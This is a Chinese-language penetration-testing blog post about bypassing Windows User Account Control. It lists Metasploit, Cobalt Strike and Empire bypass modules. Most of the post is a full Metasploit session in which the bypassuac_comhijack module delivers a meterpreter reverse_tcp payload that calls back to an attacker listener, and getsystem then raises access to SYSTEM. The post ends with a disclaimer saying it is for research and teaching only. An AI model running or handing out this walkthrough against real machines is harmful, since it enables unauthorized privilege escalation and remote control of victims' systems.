UAC 全称 User Access Control, 其作用为在程序进行管理员权限的操作时对用户进行通知, 经确认以后方可才能继续执行操作.
如果是普通用户, UAC 会让你提供管理员用户的账号密码.
如果是管理员, 则会提醒你是否继续该操作. 这样的管理员就称作"受限管理员" (Administrator 用户除外).
绕过 UAC 的方式很多, 比如 hfiref0x/UACME, 恕本人技术有限, 暂且先提供以下几种比较"方便"的 UAC 绕过方案.
metasploit
msf 自带九种 bypassuac 模块.
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection_winsxs
exploit/windows/local/bypassuac_comhijack
exploit/windows/local/bypassuac_silentcleanup
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_sluihijack
exploit/windows/local/bypassuac_fodhelper
exploit/windows/local/bypassuac_vbs
exploit/windows/local/bypassuac_injection
其中 bypassuac, bypassuac_injection 历史久远, bypassuac_comhijack 目前还未修复.
以 exploit/windows/local/bypassuac_comhijack 为例.
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_comhijack msf5 exploit(windows/local/bypassuac_comhijack) > set session 1 session => 1 msf5 exploit(windows/local/bypassuac_comhijack) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/local/bypassuac_comhijack) > set lhost 192.168.1.1 lhost => 192.168.1.1 msf5 exploit(windows/local/bypassuac_comhijack) > run [*] Started reverse TCP handler on 192.168.1.1:4444 [*] UAC is Enabled, checking level... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ... [*] Uploading payload to C:\Users\test\AppData\Local\Temp\DCRQHfyu.dll ... [*] Executing high integrity process ... [*] Sending stage (206403 bytes) to 192.168.1.99 [*] Meterpreter session 2 opened (192.168.1.1:4444 -> 192.168.1.99:49164) at 2019-07-12 21:25:32 +0800 [*] Cleaining up registry ...
meterpreter > getuid
Server username: DC2\test
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
cobalt strike
cs 自带的 bypassuac 模块与 msf 中的某些模块重复, 添加 rsmudge/ElevateKit 工具包后新增三种 bypassuac 方式, 例如 uac-wscript, uac-token 等.
empire
empire 中的部分 bypassuac 脚本还是比较新的, 不过全都是以 powershell 方式执行.
powershell/privesc/bypassuac
powershell/privesc/bypassuac_eventvwr
powershell/privesc/bypassuac_sdctlbypass
powershell/privesc/bypassuac_wscript
powershell/privesc/bypassuac_env
powershell/privesc/bypassuac_fodhelper
powershell/privesc/bypassuac_tokenmanipulation
演示略.
- By:X1r0z[exp10it.cn]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论